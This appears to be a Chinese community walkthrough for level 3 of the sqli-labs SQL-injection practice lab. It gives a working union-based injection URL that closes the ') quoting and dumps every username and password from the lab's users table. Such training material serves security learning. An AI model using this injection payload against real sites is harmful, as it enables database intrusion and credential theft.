开发者社区安全文章正文

【less-3】sqli-labs靶场第三关

2024-06-18 8

版权

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

简介： 【less-3】sqli-labs靶场第三关

网址

https://sqli.wmcoder.site/sqli-labs/Less-3/

解法

与Less-2类似，直接看这篇文章：【less-2】sqli-labs靶场第二关

不同的是，根据错误回显知道，其拼接方式为id=('$id')

故采用https://sqli.wmcoder.site/sqli-labs/Less-2/?id=1')

采用如下语句获取所有用户名和密码

https://sqli.wmcoder.site/sqli-labs/Less-3/?id=1') and 1=2 union select 1,group_concat(username), group_concat(password) from security.users --+

文章标签：

数据安全/隐私保护

未名编程

XError＿xiaoyu

1月前

SQL PHP 数据库

Sqli-labs靶场搭建

本文章是在自己在使用新版phpstudy搭建靶场过程中遇到了很多问题,但在查询无果后,决定尝试旧版的phpstudy看能否成功,很幸运,成功了,也并不是网上的教程,说是php必须在5.2及以下.我使用的是5.4版本的.是对SQL注入进行一个简单的回归,然后就是对于自己在搭建靶场中所遇到的一些问题的解决办法,以及进行安装步骤的总结,对于自己的自主配置和独立解决问题的能力是一种培养

XError＿xiaoyu

38 1 1

不拿flag不改名

1月前

安全数据库数据安全/隐私保护

sqli-labs第一关

不拿flag不改名

24 0 0

sumith

1月前

PHP

8、sqli-labs环境